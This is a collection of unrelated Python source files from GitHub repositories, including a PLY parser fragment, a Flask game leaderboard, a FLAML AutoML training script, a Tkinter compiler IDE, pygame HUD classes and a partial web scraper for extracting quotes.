    # the intended diagnostic. The truthiness check is kept for the
    # declared-but-empty case, matching the original behavior.
    if p[1] in variables and variables[p[1]]:
        arrayList = variables[p[1]][1]
        if p[3] < len(arrayList):
            value = arrayList[p[3]]
            p[0] = value
        else:
            print("Index out of range")
    else:
        print("Syntactic Error: Variable %s has not been declared." % p[1])
def p_factor_expr(p):
    'factor : LPAREN expression RPAREN'
    # Parenthesized expression: value of the inner expression.
    p[0] = p[2]
def p_empty(p):
    "empty :"
    # Epsilon production: matches nothing and yields None.
    pass
# Error rule for syntax errors
def p_error(p):
if p:
error_message = "Syntax error in line: " + str(p.lineno)
file = open(globals.projectFolderPath + "/src/tmp/error_log.txt", "w")
file.write(error_message)
file.close()
raise SyntaxError
| ce-box/CE3104-Fun-Skills | Compiler/src/compiler/syntactic/Operations.py | Operations.py | py | 2,350 | python | en | code | 7 | github-code | 13 |
# Cup holders: N people in a row of seats described by 'S' (single seat)
# and 'LL' (couple seat); count the seat groups, then cap the answer by N.
N = int(input())
seat = input()
i = cnt = 0
while i < N:
    if seat[i] == 'S':
        i += 1
        cnt += 1
    else:
        # 'L' seats come in pairs, consumed two characters at a time.
        i += 2
        cnt += 1
# cnt groups yield cnt + 1 holder positions; no more than N people need one.
if cnt + 1 > N:
    print(N)
else:
    print(cnt + 1)
1581039461 | import bcrypt
import sys
import os.path
import sqlite3 as sql
from random import shuffle
import random
import json
from flask import Flask, url_for, redirect, render_template, request, session
from functools import wraps
app = Flask(__name__)
@app.route("/", methods=['GET', 'POST'])
def renderGamePage():
    """Serve the game page; on POST, store the submitted (username, score).

    GET just renders the template; POST inserts the form's username/score
    into the leaderboard table, then re-renders the same template.
    """
    if request.method == 'POST':
        username = request.form['username']
        score = request.form['score']
        print("Username: "+username+ ", Score: "+score)
        conn = None
        try:
            BASE_DIR = os.path.dirname(os.path.abspath(__file__))
            db_path = os.path.join(BASE_DIR, "database.db")
            conn = sql.connect(db_path)
            cur = conn.cursor()
            print("Connected")
            # Parameterized query: safe against SQL injection.
            cur.execute("INSERT INTO leaderboard (username, score) VALUES (?,?)",(username, score))
            conn.commit()
            print("Upload Successful")
        except Exception:
            # Guarded rollback: the original called conn.rollback() even when
            # sql.connect() itself failed, raising NameError in the handler.
            if conn is not None:
                conn.rollback()
            print("Connection Failed")
        finally:
            # The original never closed the connection.
            if conn is not None:
                conn.close()
    return render_template('gameTemplate.html')
@app.route('/leaderboard')
def showUserInfo():
    """Render the leaderboard page with all scores in descending order."""
    conn = None
    try:
        BASE_DIR = os.path.dirname(os.path.abspath(__file__))
        db_path = os.path.join(BASE_DIR, "database.db")
        conn = sql.connect(db_path)
        conn.row_factory = sql.Row  # rows are mapping-like for the template
        cur = conn.cursor()
        print("Connected")
        cur.execute("SELECT * FROM leaderboard ORDER BY score DESC")
        rows = cur.fetchall()
        print("Selection Complete")
        return render_template('leaderboardTemplate.html', rows = rows)
    except Exception:
        print("Connection Failed: Could not retrieve database")
        return render_template('leaderboardTemplate.html')
    finally:
        # Bug fix: the original wrote `conn.close` (missing parentheses, so
        # nothing was closed) and had unreachable statements after the
        # return; close the connection exactly once here.
        if conn is not None:
            conn.close()
@app.route('/instructions')
def showInstructions():
    """Render the static instructions page."""
    return render_template('instructionTemplate.html')
@app.errorhandler(404)
def page_not_found(error):
    # Plain-text fallback with an explicit 404 status for unknown routes.
    return "Bit broken still. Couldn't find the page you requested.", 404
if __name__ == "__main__":
    # Listen on all interfaces; debug mode is for development only.
    app.run(host='0.0.0.0', debug=True)
| RoanCreed7/set09103 | coursework/main.py | main.py | py | 2,176 | python | en | code | 0 | github-code | 13 |
10887831522 | import pandas as pd
import numpy as np
import pickle
import json
from flaml import AutoML
from dotenv import dotenv_values
from sklearn.model_selection import StratifiedKFold
def amex_metric_mod(y_true, y_pred):
    """Amex competition metric: 0.5 * (normalized weighted Gini + top-4%
    capture rate), where negatives carry a weight of 20.
    """
    def _sorted_pairs(col):
        # (y_true, y_pred) rows, sorted descending by the requested column.
        pairs = np.transpose(np.array([y_true, y_pred]))
        return pairs[pairs[:, col].argsort()[::-1]]

    def _weighted_gini(col):
        pairs = _sorted_pairs(col)
        w = np.where(pairs[:, 0] == 0, 20, 1)
        random_curve = np.cumsum(w / np.sum(w))
        total_pos = np.sum(pairs[:, 0] * w)
        lorentz = np.cumsum(pairs[:, 0] * w) / total_pos
        return np.sum((lorentz - random_curve) * w)

    # Fraction of all positives captured in the top 4% (by weighted count)
    # of predictions.
    by_pred = _sorted_pairs(1)
    w = np.where(by_pred[:, 0] == 0, 20, 1)
    cut_vals = by_pred[np.cumsum(w) <= int(0.04 * np.sum(w))]
    top_four = np.sum(cut_vals[:, 0]) / np.sum(by_pred[:, 0])

    # Gini sorted by prediction, normalized by the ideal Gini (sorted by truth).
    return 0.5 * (_weighted_gini(1) / _weighted_gini(0) + top_four)
if __name__ == "__main__":
    config = dotenv_values('../.env')
    # Part 1B: Extended Regression Model
    print("Loading Extended Train FE Data")
    train = pd.read_parquet(config["ENGINEERED_DATA"] + "extended_train_fe.parquet")
    # Drop the first column (presumably the id — TODO confirm) and the last
    # (the target, selected explicitly as y below).
    FEATURES = train.columns[1:-1]
    SPLITS = 2
    RANDOM_STATE = 6474
    skf = StratifiedKFold(n_splits=SPLITS, random_state=RANDOM_STATE, shuffle=True)
    # One AutoML regressor per stratified fold; valid_idx is currently unused.
    for fold,(train_idx, valid_idx) in enumerate(skf.split(
        train, train.target)):
        X_train = train.loc[train_idx,FEATURES]
        y_train = train.loc[train_idx,"target"]
        print(f"Training Extended Regression Model Fold {fold+1}")
        automl = AutoML()
        automl.fit(X_train, y_train, task="regression", time_budget=3600)
        print('Best Extended Regression ML learner:', automl.best_estimator)
        print('Best hyperparmeter config:', automl.best_config)
        print('Best loss on validation data: {0:.4g}'.format(automl.best_loss))
        print('Training duration of best run: {0:.4g} s'.format(automl.best_config_train_time))
        print("Dumping hyperparameter json")
        with open(f"{automl.best_estimator}_FOLD_{fold+1}_extended_regression_fe.json", "w") as fp:
            model = {automl.best_estimator : automl.best_config}
            json.dump(model, fp)
        print("Saving Model")
        ext_reg_path = config["FLAML_MODELS"] + f'extended_regression_fe_FOLD_{fold+1}_{(automl.best_loss):.4g}.pkl'
        with open(ext_reg_path, 'wb') as f:
            pickle.dump(automl, f, pickle.HIGHEST_PROTOCOL)
    import sys
    # NOTE(review): this early exit makes Part 1C below unreachable; it looks
    # like temporary scaffolding — confirm before shipping.
    sys.exit()
    # Part 1C: Load and predict
    print("Load and predict test data")
    del train, X_train, y_train
    test = pd.read_parquet(config["ENGINEERED_DATA"] + "test_fe.parquet")
    test = test.drop("customer_ID", axis=1)
    # Reload the last fold's saved model and score the test set.
    with open(ext_reg_path, 'rb') as f:
        automl = pickle.load(f)
    sub = automl.predict(test)
    labels = pd.read_csv(config["SAMPLE_PATH"])
    labels["prediction"] = sub
    print("Saving Extended Regression Submission")
    labels.to_csv(config["SUBMISSION_FOLDER"] + "flaml_extended_regression_fe_submission.csv", index=False)
    del labels, sub
23058497116 | from tkinter import *
from tkinter.scrolledtext import *
import Lexer as lexer
from idlelib.percolator import Percolator
import idlelib.colorizer as ic
import LL1ParserExcep as LL1
def verificar_codigo(event=None):
    """Live lexical check: run the lexer on every keystroke and show any
    lexical error in the (otherwise read-only) output console."""
    # Temporarily make the console editable so it can be cleared.
    output_window.config(state=NORMAL)
    output_window.delete(1.0, END)
    output_window.config(state=DISABLED)
    texto = text.get("1.0", END)  # grab the editor's full contents
    palabras = texto.split()  # split the text into words
    if not (palabras == []):
        result, error = lexer.run('archivo.txt', texto)
        if error:
            # Re-enable the console programmatically to write the error text.
            output_window.config(state=NORMAL)
            output_window.delete(1.0, END)
            output_window.insert(1.0, error.as_string())
            output_window.config(state=DISABLED)
def run(event=None):
    """Full pipeline: lex the editor contents, then LL(1)-parse the token
    stream, reporting either the error or "Sintaxis valida" in the console."""
    filetxt = text.get("1.0", END)  # grab the editor's full contents
    if filetxt != '\n':
        result, error = lexer.run('archivo.txt', filetxt)
        parse = []
        if error:
            # Re-enable the read-only console to display the lexer error.
            output_window.config(state=NORMAL)
            output_window.delete(1.0, END)
            output_window.insert(1.0, error.as_string())
            output_window.config(state=DISABLED)
        else:
            #print(result)
            out = ''
            # Build a printable token listing, and collect the tokens
            # (minus EOF) for the parser.
            for token in result:
                if token.type != lexer.TT_EOF: parse.append(token)
                if token.type == ';':
                    out += " "+token.type + "\n"
                elif token.type == 'KEYWORD':
                    out += "\n"+token.type+": "+token.value+"\n"
                else:
                    out += " "+token.type
            #print(out)
            if error:
                # Re-enable the read-only console to display the error.
                output_window.config(state=NORMAL)
                output_window.delete(1.0, END)
                output_window.insert(1.0, error.as_string())
                output_window.config(state=DISABLED)
            else:
                # End-of-input marker for the LL(1) parser.
                parse.append(lexer.Token(type_='PARSE',value_="$"))
                #print(parse)
                parser = LL1.Parser()
                parser.main(parse)
                error = parser.algorithm()
                if error:
                    # Re-enable the read-only console to display the error.
                    output_window.config(state=NORMAL)
                    output_window.delete(1.0, END)
                    output_window.insert(1.0, error.as_string())
                    output_window.config(state=DISABLED)
                else:
                    # Re-enable the read-only console to report success.
                    output_window.config(state=NORMAL)
                    output_window.delete(1.0, END)
                    output_window.insert(1.0, "Sintaxis valida")
                    output_window.config(state=DISABLED)
    else:
        # Re-enable the read-only console to report the empty-input case.
        output_window.config(state=NORMAL)
        output_window.delete(1.0, END)
        output_window.insert(1.0, "Texto Vacio")
        output_window.config(state=DISABLED)
window = Tk()
window.geometry("1000x800")
window.title("Analizador Léxico")
# create and configure menu
menu = Menu(window)
window.config(menu=menu)
# create input frame
input_frame = Frame(window)
input_frame.pack(fill=BOTH, side=TOP, padx=15, pady=20)
# Title Label
title_label = Label(input_frame, text = "Compiler", font=("Arial Bold", 20), fg = "#2B3239")
title_label.pack(side=TOP, padx=25, pady=15)
# create input_window window for writing code
input_window = ScrolledText(input_frame, font=("Arial", 10), wrap=None)
input_window.pack(padx = 10, side=LEFT, fill=BOTH, expand=True)
# Área de texto para ingresar el código
text = ScrolledText(input_window, font=("Arial", 10))
text.pack(fill=BOTH, side=LEFT,expand=True) # Rellena y expande el widget de texto
Percolator(text).insertfilter(ic.ColorDelegator())
text.bind('<KeyRelease>', verificar_codigo) # Asocia la función verificar_texto al evento de liberación de tecla
# create output frames
output_frame = Frame(window)
output_frame.pack(fill=X,side=BOTTOM, padx=15, pady=20, expand=False)
# Title Label
output_label = Label(output_frame, text = "Console", font=("Arial Bold", 14), fg = "#2B3239")
output_label.pack(side=TOP, padx=20, pady=15)
# create output window to display output of written code
output_window = ScrolledText(output_frame,state=DISABLED,font=("Arial Bold", 15), height=10)
output_window.pack(padx = 10, pady = 10, side=BOTTOM, fill=BOTH, expand=1)
output_window.config(fg="red")
# create menus
file_menu = Menu(menu, tearoff=0)
edit_menu = Menu(menu, tearoff=0)
run_menu = Menu(menu, tearoff=0)
view_menu = Menu(menu, tearoff=0)
theme_menu = Menu(menu, tearoff=0)
# function for light mode window
def light():
window.config(bg="#CFDCE7")
title_label.config(fg="#2B3239",bg="#CFDCE7")
input_frame.config(bg="#CFDCE7")
input_window.config(fg="#2B3239", bg="white")
#OUTPUT
output_label.config(fg="#2B3239", bg="#CFDCE7")
output_frame.config( bg="#CFDCE7")
output_window.config(fg="#2B3239", bg="white")
#status_bars.config(fg="#2B3239",bg="#CFDCE7")
# function for dark mode window
def dark():
window.config(bg="#183A59")
title_label.config(fg="white",bg="#183A59")
input_frame.config(bg="white")
input_window.config(fg="white", bg="black")
#OUTPUT
output_label.config(fg="white", bg="#183A59")
output_frame.config(bg="#183A59")
output_window.config(fg="red", bg="black")
# add commands to change themes
theme_menu.add_command(label="light", command=light)
theme_menu.add_command(label="dark", command=dark)
# add menu labels
menu.add_cascade(label="Archivo", menu=file_menu)
menu.add_cascade(label="Editar", menu=edit_menu)
menu.add_cascade(label="Ejecutar", menu=run_menu)
menu.add_cascade(label="Ver", menu=view_menu)
menu.add_cascade(label="Tema", menu=theme_menu)
run_menu.add_command(label="Ejecutar", accelerator="F5", command=run)
# Ejecutar la window principal de Tkinter
window.mainloop() | LUCASSANCHEZ12/My_own_Programming_Language | IDE.py | IDE.py | py | 6,263 | python | es | code | 0 | github-code | 13 |
41891364652 | import sys
from glob import glob
import re
files = glob(sys.argv[1])
for path in files:
outpath = path + '.out'
vb = 'Metrics for Query: 1\
Count: 256 times executed in whole run\
AQET: 0.006403 seconds (arithmetic mean)\
AQET(geom.): 0.006140 seconds (geometric mean)\
QPS: 593.01 Queries per second\
minQET/maxQET: 0.00397338s / 0.02531122s\
Average result count: 0.00\
min/max result count: 0 / 0\
Number of timeouts: 0'
allValues = {}
resultList = []
with open(path, 'r') as inf:
content = inf.read()
matches = re.findall('Metrics for Query:[\s\S]*?Number of timeouts:\s+\d+\n', content)
for match in matches:
resultValue = {}
lines = match.split('\n')
for line in lines:
if(line != ''):
duo = line.split(':')
allValues[duo[0]] = duo[0]
resultValue[duo[0]] = re.findall('^[\d\s\./s]*', duo[1].strip())[0].strip()
resultList.append(resultValue)
with open(outpath, 'w+') as outf:
outf.write('\t'.join(allValues) + '\n')
with open(outpath, 'a') as outf:
for result in resultList:
rowValue = ''
for value in allValues:
if value in result:
rowValue = rowValue + result[value]
rowValue = rowValue + '\t'
outf.write(rowValue + '\n')
| LinkedDataFragments/Availability-Performance-Benchmark | evaluation/parsebsbm.py | parsebsbm.py | py | 1,564 | python | en | code | 0 | github-code | 13 |
32564895241 | # For information about initializing game buttons, see button py
import pygame.ftfont # The module can render text to the screen
class Button:
# message is the text we want to display in the button
def __init__(self, ai_settings, screen, message):
"""Initialize button properties"""
self.screen = screen
self.screen_rect = screen.get_rect()
# Set the size and other properties of the button
self.width, self.height = 200, 50
self.button_color = (0, 255, 0) # The button is set to green
self.text_color = (255, 255, 255) # The text content is set to white
self.font = pygame.font.SysFont(None, 48) # None indicates the default font and 48 indicates the font size
# Create a rect object for the button and center it
self.rect = pygame.Rect(0, 0, self.width, self.height)
self.rect.center = self.screen_rect.center
# Create a label for the button
self.prep_msg(message)
def prep_msg(self, message):
"""take message Render as an image and center it in the button"""
self.msg_image = self.font.render(message, True, self.text_color,
self.button_color) # Convert text to image
self.msg_image_rect = self.msg_image.get_rect()
self.msg_image_rect.center = self.rect.center
def draw_button(self):
"""Draw a button before you draw text"""
self.screen.fill(self.button_color, self.rect) # Draw button
self.screen.blit(self.msg_image, self.msg_image_rect) # Draw text | neetiachar/Alien-Invasion-Project | prj_files/button.py | button.py | py | 1,591 | python | en | code | 0 | github-code | 13 |
1527917536 | #
# @lc app=leetcode id=3 lang=python3
#
# [3] Longest Substring Without Repeating Characters
#
# @lc code=start
class Solution:
def lengthOfLongestSubstring(self, s: str) -> int:
if len(s)==0 or len(s)==1:
return len(s)
windStart=0;windEnd=0;windHash={s[0]:0}
currLen=1;maxLen=1
for index in range(1,len(s)):
ch=s[index]
if ch not in windHash.keys():
windEnd+=1;currLen+=1;maxLen=max(maxLen,currLen)
windHash[ch]=index
else:
pos=windHash[ch]
chars=[i for i in s[windStart:pos+1]]
popFromHash(windHash, chars)
windStart=pos+1;windEnd=index
currLen=windEnd-windStart+1
maxLen=max(maxLen,currLen)
windHash[ch]=index
return maxLen
def popFromHash(ht,keys):
for key in keys:
ht.pop(key)
# @lc code=end
| stuntmartial/DSA | Leetcode/3.longest-substring-without-repeating-characters.py | 3.longest-substring-without-repeating-characters.py | py | 972 | python | en | code | 0 | github-code | 13 |
23296099620 | """
This script introduces the 'Complex' class that is fulling the Database object
A Complex takes as input a pdb, a mrc and some extra selection tools and outputs a grid aligned with the mrc.
It makes the conversion from (n,3+features) matrices to the grid format.
"""
import os
import sys
import time
import numpy as np
from sklearn.gaussian_process.kernels import RBF
if __name__ == '__main__':
script_dir = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(script_dir, '..'))
from utils import mrc_utils, pymol_utils
from utils.rotation import Rotor
def just_one(coord, xi, yi, zi, sigma, feature, total_grid, use_multiprocessing=False):
"""
:param coord: x,y,z
:param xi: a range of x coordinates
:param yi: a range of x coordinates
:param zi: a range of x coordinates
:param feature: The feature to put around this given point
:param sigma: The scale of RBF
:param total_grid: The grid to add to
:param use_multiprocessing: If this is to be used in a multiprocessing setting
:return:
"""
# Find subgrid
nx, ny, nz = xi.size, yi.size, zi.size
bound = int(4 * sigma)
x, y, z = coord
binx = np.digitize(x, xi)
biny = np.digitize(y, yi)
binz = np.digitize(z, zi)
min_bounds_x, max_bounds_x = max(0, binx - bound), min(nx, binx + bound)
min_bounds_y, max_bounds_y = max(0, biny - bound), min(ny, biny + bound)
min_bounds_z, max_bounds_z = max(0, binz - bound), min(nz, binz + bound)
X, Y, Z = np.meshgrid(xi[min_bounds_x: max_bounds_x],
yi[min_bounds_y: max_bounds_y],
zi[min_bounds_z:max_bounds_z],
indexing='ij')
X, Y, Z = X.flatten(), Y.flatten(), Z.flatten()
# Compute RBF
rbf = RBF(sigma)
subgrid = rbf(coord, np.c_[X, Y, Z])
subgrid = subgrid.reshape((max_bounds_x - min_bounds_x,
max_bounds_y - min_bounds_y,
max_bounds_z - min_bounds_z))
# Broadcast the feature throughout the local grid.
subgrid = subgrid[None, ...]
feature = feature[:, None, None, None]
subgrid_feature = subgrid * feature
# Add on the first grid
if not use_multiprocessing:
total_grid[:,
min_bounds_x: max_bounds_x,
min_bounds_y: max_bounds_y,
min_bounds_z:max_bounds_z] += subgrid_feature
else:
return min_bounds_x, max_bounds_x, min_bounds_y, max_bounds_y, min_bounds_z, max_bounds_z, subgrid_feature
def fill_grid_from_coords(coords, bins, features=None, sigma=1.):
"""
Generate a grid from the coordinates
:param coords: (n,3) array
:param bins: 3 arrays of bins. They can originate from raw coords or from another mrc.
:param features: (n,k) array or None
:param sigma:
:return:
"""
xi, yi, zi = bins
nx, ny, nz = xi.size, yi.size, zi.size
features = np.ones((len(coords), 1)) if features is None else features
feature_len = features.shape[1]
total_grid = np.zeros(shape=(feature_len, nx, ny, nz))
for i, coord in enumerate(coords):
just_one(coord, feature=features[i], xi=xi, yi=yi, zi=zi, sigma=sigma, total_grid=total_grid)
return total_grid.astype(np.float32)
def get_bins(coords, spacing, padding, xyz_min=None, xyz_max=None):
"""
Compute the 3D bins from the coordinates
"""
if xyz_min is None:
xm, ym, zm = coords.min(axis=0) - padding
else:
xm, ym, zm = xyz_min - padding
if xyz_max is None:
xM, yM, zM = coords.max(axis=0) + padding
else:
xM, yM, zM = xyz_max + padding
xi = np.arange(xm, xM, spacing)
yi = np.arange(ym, yM, spacing)
zi = np.arange(zm, zM, spacing)
return xi, yi, zi
def build_grid_from_coords(coords, features=None, spacing=2., padding=0, xyz_min=None, xyz_max=None, sigma=1.):
"""
Generate a grid from the coordinates
:param coords: (n,3) array
:param features: (n,k) array or None
:param spacing:
:param padding:
:param xyz_min:
:param xyz_max:
:param sigma:
:return:
"""
return fill_grid_from_coords(coords=coords,
features=features,
bins=get_bins(coords, spacing, padding, xyz_min, xyz_max),
sigma=sigma)
class GridComplex:
"""
Object containing a protein and a density
The main difficulty arises from the creation of the grid for the output,
because we need those to align with the input mrc
"""
def __init__(self, mrc_path, pdb_path, antibody_selection=None, return_sdf=False, rotate=True):
# First get the MRC data
self.mrc = mrc_utils.MRCGrid.from_mrc(mrc_path)
self.rotor = Rotor() if rotate else Rotor(0, 0)
self.target_tensor = self.get_target_grid(pdb_path=pdb_path,
antibody_selection=antibody_selection,
return_sdf=return_sdf)
self.input_tensor = self.mrc.data[None, ...]
self.input_tensor, self.target_tensor = Rotor().rotate_tensors([self.input_tensor, self.target_tensor])
def get_target_grid(self, pdb_path, antibody_selection=None, return_sdf=False):
# Get the corresponding empty grid, this follows 'resample' with origin offset
bins = [np.arange(start=self.mrc.origin[i],
stop=(self.mrc.origin + self.mrc.data.shape * self.mrc.voxel_size)[i],
step=self.mrc.voxel_size[i])
for i in range(3)]
# Now let's get the relevant coordinates to embed in this grid
antibody_coords = pymol_utils.get_protein_coords(pdb_path=pdb_path,
pymol_selection=antibody_selection)
antigen_coords = pymol_utils.get_protein_coords(pdb_path=pdb_path,
pymol_selection=f"not ({antibody_selection})")
# Get the corresponding grid
antibody_grid = fill_grid_from_coords(coords=antibody_coords, bins=bins)
antigen_grid = fill_grid_from_coords(coords=antigen_coords, bins=bins)
antibody_grid = np.tanh(antibody_grid)
antigen_grid = np.tanh(antigen_grid)
void_grid = np.maximum(0, 1 - antibody_grid - antigen_grid)
target_tensor = np.concatenate((antibody_grid, antigen_grid, void_grid))
if return_sdf:
antibody_dists = self.sdf(antibody_grid)[None, ...]
antigen_dists = self.sdf(antigen_grid)[None, ...]
target_tensor = np.concatenate((target_tensor, antibody_dists, antigen_dists), axis=0)
self.target_tensor = target_tensor
return target_tensor
@staticmethod
def sdf(grid):
"""
Compute a signed distance function of the isolevel pseudo surface defined
as pixels comprised between 0.05 and 0.15
:param grid:
:return:
"""
import scipy
grid = np.squeeze(grid)
filter_array = np.logical_or(grid < 0.05, grid > 0.15)
distances_to_surf = scipy.ndimage.distance_transform_edt(filter_array)
target_distance = np.tanh(distances_to_surf / 3) # 6A is the right size ?
sdf = np.sign(grid - 0.1) * target_distance
return sdf.astype(np.float32)
if __name__ == '__main__':
datadir_name = "../data/pdb_em"
dirname = '7LO8_23464'
pdb_name, mrc_name = dirname.split("_")
pdb_path = os.path.join(datadir_name, dirname, f"{pdb_name}.cif")
mrc_path = os.path.join(datadir_name, dirname, "resampled_0_2.mrc")
comp = GridComplex(mrc_path=mrc_path,
pdb_path=pdb_path,
antibody_selection='chain H or chain L',
return_sdf=False,
# return_sdf=True,
)
# We get the right grid supervision :
target = comp.target_tensor
# comp.mrc.save(outname=os.path.join(datadir_name, dirname, "antibody.mrc"), data=target[0], overwrite=True)
# comp.mrc.save(outname=os.path.join(datadir_name, dirname, "antigen.mrc"), data=target[1], overwrite=True)
# comp.mrc.save(outname=os.path.join(datadir_name, dirname, "void.mrc"), data=target[2], overwrite=True)
# We get the right SDF supervision :
array = GridComplex.sdf(target[0])
# comp.mrc.save(outname=os.path.join(datadir_name, dirname, "thresh.mrc"), data=array, overwrite=True)
| Vincentx15/crIA-EM | load_data/GridComplex.py | GridComplex.py | py | 8,567 | python | en | code | 0 | github-code | 13 |
74023195539 | import pygame
from scripts import constants, globals
from scripts.player import Player
class Hud(pygame.sprite.Sprite):
def __init__(self):
self.hp = HPBar()
self.ammo = AmmoBar()
self.wpn = WeaponName()
self.msg = Message()
def update(self):
self.hp.update()
self.ammo.update()
self.wpn.update()
self.msg.update()
def set_player(self, player: Player):
self.hp.player = player
self.ammo.player = player
self.wpn.player = player
class HPBar(pygame.sprite.Sprite):
def __init__(self):
self.player = None
self.font = pygame.font.Font("assets/fonts/BULKYPIX.TTF", 16)
self.text = self.update_counter()
self.rect = self.text.get_rect()
self.text.set_colorkey((0,0,0))
self.rect.bottomleft = (8, constants.SCREEN_HEIGHT)
def update(self):
self.text = self.update_counter()
def update_counter(self) -> pygame.Surface:
try:
return self.font.render("Health: " + str(self.player.hp), True, (255,255,255))
except AttributeError:
return self.font.render("", True, (255,255,255))
class AmmoBar(pygame.sprite.Sprite):
def __init__(self):
self.player = None
self.font = pygame.font.Font("assets/fonts/BULKYPIX.TTF", 16)
self.text = self.font.render("", False, (255,255,255))
self.rect = self.text.get_rect()
self.text.set_colorkey((0,0,0))
self.rect.bottomleft = (constants.SCREEN_WIDTH - 120, constants.SCREEN_HEIGHT)
def update(self):
try:
if self.player.equipped_weapon.ammo_consumption < 1:
ammocounter = 'INF'
else:
ammocounter = str(self.player.equipped_weapon.ammo)
self.text = self.font.render("Ammo: " + ammocounter, True, (255,255,255))
except AttributeError:
pass
class WeaponName(pygame.sprite.Sprite):
def __init__(self):
self.player = None
self.font = pygame.font.Font("assets/fonts/BULKYPIX.TTF", 12)
self.text = self.font.render("", False, (255,255,255))
self.rect = self.text.get_rect()
self.text.set_colorkey((0,0,0))
self.rect.bottomleft = (constants.SCREEN_WIDTH - 120, constants.SCREEN_HEIGHT - 20)
def update(self):
try:
self.text = self.font.render(self.player.equipped_weapon.name, True, (255,255,255))
except AttributeError:
pass
class Message(pygame.sprite.Sprite):
def __init__(self):
self.font = pygame.font.Font("assets/fonts/BULKYPIX.TTF", 12)
self.text = self.font.render("", False, (255,255,255))
self.rect = self.text.get_rect()
self.text.set_colorkey((0,0,0))
self.rect.bottomleft = (16, 16)
self.message_duration = 120
self.message_counter = 120
def show_message(self, message: str):
self.text = self.font.render(message, False, (255,255,255))
self.message_counter = 0
def update(self):
if self.message_counter >= self.message_duration:
self.text = self.font.render("", False, (255,255,255))
else:
self.message_counter += 1 | donqnr/unnamed-pygame-platformer | scripts/ui.py | ui.py | py | 3,236 | python | en | code | 1 | github-code | 13 |
38425356332 | from service.worker_service import Worker
from threading import Thread, Lock, Event
from module import helper
from time import sleep
class Manager(Thread):
def __init__(self, rabbitmq_pool, proxy_pool, credential_pool):
super().__init__()
self.index = 0
self.rabbitmq_pool = rabbitmq_pool
self.proxy_pool = proxy_pool
self.credential_pool = credential_pool
self.worker_pool = dict()
self.lock = Lock()
self.stop_event = Event()
def add_new_worker(self):
name = helper.generate_name(prefix=f"worker", exist_name=self.worker_pool.keys())
self.index += 1
worker = Worker(name=name, rabbitmq_pool=self.rabbitmq_pool)
worker.start()
self.lock.acquire()
self.worker_pool[name] = worker
self.lock.release()
def get_active_worker(self, typ3):
for name, worker in self.worker_pool[typ3].items():
if not worker.is_alive():
return worker
else:
return None
def reset_worker(self, worker):
name = worker.name
self.lock.acquire()
worker = self.worker_pool.pop(name)
self.lock.release()
worker.stop()
del worker
self.add_new_worker()
def stop(self):
self.stop_event.set()
def run(self):
print(f"Manager is started...")
while True:
if self.stop_event.is_set():
print("Manager is stopped!!!")
break
sleep(3600)
self.proxy_pool.save()
self.credential_pool.save()
| t4iv0i/multiplatform_crawler | service/manager_service.py | manager_service.py | py | 1,612 | python | en | code | 1 | github-code | 13 |
25685898222 | from sys import argv
from db.client import DbClient
if __name__ == "__main__":
if len(argv) > 1 and argv[1].lower().strip() == "--new":
dbc = DbClient(new=True)
else:
dbc = DbClient()
for spider in dbc.spiders:
p = spider.provider
dbc.combos_to_csv(1, dbc.missing(p), f'{p}Input')
| HartBlanc/CardRates | src/createCSV.py | createCSV.py | py | 329 | python | en | code | 1 | github-code | 13 |
21538173674 | # stupid addition takes two values(x, y)
# if x is str and y is str
# change both value to int and sum
# if x is int and y is int
# change both value to string and concatenate
# else return none
def stupid_addition(x, y):
if isinstance(x, str) and isinstance(y, str):
return int(x) + int(y)
elif isinstance(x, int) and isinstance(y, int):
return str(x) + str(y)
else:
return "none"
print("1 and 2 string", stupid_addition("1", "2"))
print("1 and 2 int", stupid_addition(1, 2))
print("1 and 2 different", stupid_addition("1", 2))
| Mark-McAdam/cs_lambda | Intro-Python-I/stupid_addition.py | stupid_addition.py | py | 597 | python | en | code | 0 | github-code | 13 |
4000541135 | import json
from bs4 import BeautifulSoup
import requests
import re
import sys
from nltk import sent_tokenize
from nltk.tokenize.punkt import PunktSentenceTokenizer, PunktParameters
import pprint
import dimensions
import repository
pp = pprint.PrettyPrinter(indent=4)
DictQuote={}
final_quote=""
final_image=""
punctuation = [".", "!", "?", ")", "]", "\"", "'", u"\u201D", u"\u201C", u"\u0027", u"\u2018", u"\u2019",]
prefixes = ['dr', 'vs', 'mr', 'mrs','ms' ,'prof', 'inc','jr','i.e']
"""
emotive= ['feel', 'chill', 'fire', 'burn', 'feel the fire']
s='feel the fire'
for word in emotive:
if word in s:
score +=1
"""
def parse(argv):
found_text=0
text=""
r = requests.get(argv)
data = r.text
soup = BeautifulSoup(data,from_encoding='utf8')
paras = soup.find_all('p')
img= soup.find_all('img')
img2= soup.find_all('meta')
allQuotes=[]
allSen = []
merge=[]
mergeComma=[]
proper=[]
for para in paras:
"""
cl = para.get('class')
if 'tweet' in str(cl).lower():
continue
""" # filters tweets
text=para.get_text()
web= para.find_all('webonly')
if web:
for w in web:
s=w.string
i=text.find(s)
text1= text[:i]
text2= text[i+len(s):]
text=text1+text2
text.encode('utf-8')
sentences= []
quotes= []
properStart=0
capC=0;
lastBegin=0 #tracks where the last sentence began
nextBegin=0 # tracks where the next sentence will begin, set when ending punctuation is found
lastSpace=0
inQuote= False
quoteStart = 0
lastCap=0 # last capitol symbol (ASCII only)
spaceQ=0 # number of spaces in a quote
wasQ= False # was there a quote in the last sentence (not if the qutoe ended it)
hadQ=False # did the last sentence have a quote
mightMer=False #If the quote should be merged witht the previous one
mergeC=False
for i in range(len(text)):
if i == nextBegin: # sets the start of a new sentence
lastBegin=i
c=text[i]
if c in punctuation and c!="'":
if capC>1:
proper.append(text[properStart:i])
capC=0
if c== " ":
lastSpace=i
if inQuote:
spaceQ+=1
elif c=="." and (text[lastSpace+1:i].lower() in prefixes or i-lastCap<4 or i-lastSpace<2):
# all the cases for when a period doesn't end a sentence
do=0
#continue
elif c== "." or c=="!" or c=="?" or c==";": # end of a sentence
j=i
while j<len(text) and text[j] in punctuation:
j+=1
s = text[lastBegin:j]
sentences.append(s)
nextBegin= j+1
if capC>1:
proper.append(text[properStart:i])
capC=0
#print str(hadQ)+"-----"
hadQ=False
if wasQ:
hadQ=True
wasQ=False
elif c == "\"": # Ascii quote, toggles whether or not to be in a quote
if inQuote:
q= text[quoteStart:i+1]
#print str(quoteStart)+ " - ascii end"
inQuote=False
if spaceQ>3:
if mightMer:
place=len(quotes)+len(allQuotes)
merge.append(place)
if mergeC:
mergeComma.append(place)
quotes.append(q)
spaceQ=0
if not (nextBegin>i):
wasQ=True
mightMer=False
mergeC= False
else:
inQuote=True
quoteStart=i
